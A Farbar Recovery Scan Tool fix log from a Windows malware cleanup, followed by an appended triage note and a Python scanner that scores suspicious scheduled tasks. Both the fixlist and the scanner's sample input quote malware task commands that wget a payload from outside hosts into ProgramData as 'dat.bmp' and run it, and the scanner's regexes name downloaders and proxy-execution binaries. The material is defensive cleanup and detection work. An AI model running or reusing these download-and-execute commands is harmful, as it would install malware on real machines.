Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-02-2015 01
Ran by Proteus at 2015-02-05 16:55:42 Run:1
Running from C:\Users\Proteus\Desktop\FRST2
Loaded Profiles: UpdatusUser & Proteus (Available profiles: UpdatusUser & Proteus)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
CreateRestorePoint:
Task: {49ACE010-577E-4A92-BC37-A396BD06DD3C} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=XhyuslHf2k;up;1421852599 & start cmd /R dat.bmp
Task: {52BD9ED5-BE48-4C77-B61E-69F2B29FA155} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=iUbbj8phSd;up;1421852589 & start cmd /R dat.bmp
Task: {7A0BED88-1594-4021-8842-72AD25A9A43B} - System32\Tasks\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6} => pcalua.exe -a C:\Users\Proteus\AppData\Roaming\awesomehp\UninstallManager.exe
Task: {7DCC40B8-FC2C-4903-8585-D5A44E56A190} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=9a9CS535Ou;camtasia.exe;1421836212 & start cmd /R dat.bmp <==== ATTENTION
Task: {70055F6B-23A1-442B-86EC-6D69DFADECC6} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe
Startup: C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M-Kernel_a69.zip.lnk
S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 cpuz135; \??\C:\windows\TEMP\cpuz135\cpuz135_x64.sys [X]
HKLM-x32\...\Run: [fst_pl_81] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Andy] => C:\Program Files\Andy\HandyAndy.exe
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\...\Run: [] => [X]
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp220141121
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=21.5.0.19
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-1866740971-3537411966-2138577161-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
C:\ProgramData\*.*
C:\ProgramData\{1b30cb05-82b9-9e5a-1b30-0cb0582b2c16}
C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}
C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}
C:\ProgramData\Temp
C:\Users\Proteus\AppData\Local\Google\Chrome
C:\Users\Proteus\Desktop\FOLDERY\PROGRAMY\Samsung Kies.lnk
C:\Users\Proteus\Downloads\*(*)-dp*.exe
C:\windows\SysWOW64\AMD64
C:\windows\SysWOW64\X86
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
Reg: reg delete HKCU\Software\Google\Chrome /f
Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f
Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f
CMD: sc config "PLAY ONLINE. RunOuc" start= disabled
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{49ACE010-577E-4A92-BC37-A396BD06DD3C}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49ACE010-577E-4A92-BC37-A396BD06DD3C}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEMDOWN => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEMDOWN" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{52BD9ED5-BE48-4C77-B61E-69F2B29FA155}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52BD9ED5-BE48-4C77-B61E-69F2B29FA155}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEMUP => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEMUP" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7A0BED88-1594-4021-8842-72AD25A9A43B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A0BED88-1594-4021-8842-72AD25A9A43B}" => Key deleted successfully.
C:\Windows\System32\Tasks\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7DCC40B8-FC2C-4903-8585-D5A44E56A190}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7DCC40B8-FC2C-4903-8585-D5A44E56A190}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEM => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{70055F6B-23A1-442B-86EC-6D69DFADECC6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70055F6B-23A1-442B-86EC-6D69DFADECC6}" => Key deleted successfully.
C:\Windows\System32\Tasks\EasyPartitionManager => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\EasyPartitionManager" => Key deleted successfully.
C:\Users\Proteus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M-Kernel_a69.zip.lnk not found.
cpuz130 => Service deleted successfully.
cpuz135 => Service deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\fst_pl_81 => value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Andy => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoControlPanel => value deleted successfully.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => Key deleted successfully.
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => Key not found.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Value was restored successfully.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Error setting value.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\Microsoft\Internet Explorer\Main\\Search Bar => value deleted successfully.
HKU\S-1-5-21-1866740971-3537411966-2138577161-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value not found.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully.
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => Key not found.
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3" => Key deleted successfully.
C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll => Moved successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9" => Key deleted successfully.
C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll not found.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\MozillaPlugins\@tools.google.com/Google Update;version=3" => Key deleted successfully.
C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll => Moved successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001\Software\MozillaPlugins\@tools.google.com/Google Update;version=9" => Key deleted successfully.
C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll not found.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}" => Key deleted successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => Key deleted successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}" => Key deleted successfully.
"HKU\S-1-5-21-1866740971-3537411966-2138577161-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}" => Key deleted successfully.
"C:\ProgramData\*.*" directory move:

Could not move "C:\ProgramData\*.*" directory. => Scheduled to move on reboot.

C:\ProgramData\{1b30cb05-82b9-9e5a-1b30-0cb0582b2c16} => Moved successfully.
"C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}" => File/Directory not found.
"C:\ProgramData\{d0a5e402-7f84-7b8f-d0a5-5e4027f89009}" => File/Directory not found.
C:\ProgramData\Temp => Moved successfully.
C:\Users\Proteus\AppData\Local\Google\Chrome => Moved successfully.
C:\Users\Proteus\Desktop\FOLDERY\PROGRAMY\Samsung Kies.lnk => Moved successfully.
C:\Users\Proteus\Downloads\*(*)-dp*.exe => Moved successfully.
C:\windows\SysWOW64\AMD64 => Moved successfully.
C:\windows\SysWOW64\X86 => Moved successfully.

========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete HKCU\Software\Google\Chrome /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete HKLM\SOFTWARE\Google\Chrome /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f =========

The operation completed successfully.


========= End of Reg: =========


========= reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f =========

The operation completed successfully.


========= End of Reg: =========


========= sc config "PLAY ONLINE. RunOuc" start= disabled =========

[SC] ChangeServiceConfig SUCCESS


========= End of CMD: =========

EmptyTemp: => Removed 4.1 GB temporary data.


=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2015-02-05 17:03:43)<=

"C:\ProgramData\*.*" => Directory could not move.

==== End of Fixlog 17:03:43 ====
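Triage of the Task: entries in the fixlist above, as an added example that is not part of FRST or of this log. The three SYSTEMDOWN / SYSTEMUP / SYSTEM tasks share one download-and-execute shape: cd into the world-writable C:\ProgramData, a long `ping -n` used as a sleep, `wget -t 0 --retry-connrefused` (retry forever) saving the payload under an image name, then `start cmd /R dat.bmp` to run it regardless of extension. The fourth task launches a binary from AppData through pcalua.exe, a Windows compatibility-assistant binary that will start an arbitrary program given with -a. The scanner below parses FRST `Task:` lines and scores those traits; the regexes, indicator names, weights and threshold are the editor's own assumptions, not anything FRST does. The Task: lines in SAMPLE_LOG are copied from the fixlist; the NightlyBackup line is a constructed benign control.

```python
import re
from dataclasses import dataclass, field

# Sample input: the first five Task: lines are copied from the fixlist above;
# the NightlyBackup line is a constructed benign control (not from the log).
SAMPLE_LOG = r"""
Task: {49ACE010-577E-4A92-BC37-A396BD06DD3C} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=XhyuslHf2k;up;1421852599 & start cmd /R dat.bmp
Task: {52BD9ED5-BE48-4C77-B61E-69F2B29FA155} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=iUbbj8phSd;up;1421852589 & start cmd /R dat.bmp
Task: {7A0BED88-1594-4021-8842-72AD25A9A43B} - System32\Tasks\{1C57B201-D7B9-445A-90ED-7F1E2614E4A6} => pcalua.exe -a C:\Users\Proteus\AppData\Roaming\awesomehp\UninstallManager.exe
Task: {7DCC40B8-FC2C-4903-8585-D5A44E56A190} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=9a9CS535Ou;camtasia.exe;1421836212 & start cmd /R dat.bmp <==== ATTENTION
Task: {70055F6B-23A1-442B-86EC-6D69DFADECC6} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe
Task: {00000000-0000-0000-0000-000000000000} - System32\Tasks\NightlyBackup => C:\Program Files\Backup\backup.exe /nightly
"""

# FRST "Task:" entry: {GUID} - System32\Tasks\<name> => <command> [<==== ATTENTION]
TASK_RE = re.compile(
    r"^Task:\s+(?P<guid>\{[0-9A-Fa-f-]+\})\s+-\s+System32\\Tasks\\(?P<name>\S+)\s+=>\s+"
    r"(?P<cmd>.+?)(?:\s+<=+\s*ATTENTION)?\s*$"
)
PING_SLEEP = re.compile(r"\bping\s+\S+\s+-n\s+(\d+)", re.I)      # ping abused as a sleep
DOWNLOADER = re.compile(r"\b(?:wget|curl|bitsadmin|certutil)\b", re.I)
URL = re.compile(r'https?://[^\s"]+')
OUTPUT_FILE = re.compile(r"\s-[oO]\s+(\S+)")                       # wget -O / curl -o <file>
EXEC_VIA_CMD = re.compile(r"\b(?:start\s+)?cmd(?:\.exe)?\s+/[rRcCkK]\s+(\S+)")
RETRY_FOREVER = re.compile(r"\s-t\s+0\b|--retry-connrefused|--tries[= ]0")
USER_WRITABLE = re.compile(r"\\(?:ProgramData|AppData|Temp|Users\\Public)\b", re.I)
PROXY_EXEC = re.compile(r"\b(?:pcalua|forfiles|mshta|rundll32|regsvr32)\b", re.I)
NON_EXEC_EXT = {"bmp", "jpg", "jpeg", "png", "gif", "txt", "dat", "log", "pdf"}

# Heuristic weights chosen for this example (assumption); tune to your environment.
WEIGHTS = {"ping_sleep": 1, "downloader": 2, "retry_forever": 1,
           "writable_dir": 1, "payload_masquerade": 3, "proxy_exec": 3}
SUSPICIOUS_THRESHOLD = 4


@dataclass
class Finding:
    guid: str
    name: str
    command: str
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return sum(WEIGHTS[i] for i in self.indicators)

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def analyze_task(line: str):
    """Parse one FRST 'Task:' line; return a Finding, or None for any other line."""
    m = TASK_RE.match(line.strip())
    if m is None:
        return None
    cmd = m.group("cmd")
    f = Finding(m.group("guid"), m.group("name"), cmd, urls=URL.findall(cmd))
    ping = PING_SLEEP.search(cmd)
    if ping and int(ping.group(1)) >= 10:        # "-n 350 -w 1000" is roughly a 350 s delay
        f.indicators.append("ping_sleep")
    if DOWNLOADER.search(cmd) or f.urls:
        f.indicators.append("downloader")
    if RETRY_FOREVER.search(cmd):
        f.indicators.append("retry_forever")
    if USER_WRITABLE.search(cmd):
        f.indicators.append("writable_dir")
    out = OUTPUT_FILE.search(cmd)
    if out:
        # Payload written under a non-executable extension and then handed to cmd /R.
        saved = out.group(1).lower()
        executed = {a.lower() for a in EXEC_VIA_CMD.findall(cmd)}
        if saved in executed and saved.rsplit(".", 1)[-1] in NON_EXEC_EXT:
            f.indicators.append("payload_masquerade")
    if PROXY_EXEC.search(cmd):
        f.indicators.append("proxy_exec")
    return f


def scan(text: str) -> list:
    """All Task: findings in an FRST log, in file order."""
    return [f for f in map(analyze_task, text.splitlines()) if f is not None]


def suspicious_tasks(text: str) -> list:
    """Findings at or above the threshold, highest score first (stable for ties)."""
    return sorted((f for f in scan(text) if f.suspicious), key=lambda f: -f.score)


if __name__ == "__main__":
    for f in suspicious_tasks(SAMPLE_LOG):
        print(f"{f.score:>2} {f.name:<40} {','.join(f.indicators)}")
        for u in f.urls:
            print(f"   url: {u}")
```

Run against the fixlist, the three SYSTEM* tasks score 8 (every indicator except proxy_exec), the pcalua task scores 4 (LOLBin proxy plus a target under AppData), and EasyPartitionManager and the control task score 0. The URLs it pulls out are the ones to block at the proxy and hunt for in DNS logs; the `data=` parameter with a timestamp suffix is the same across the three samples and is a useful pivot even when the host changes.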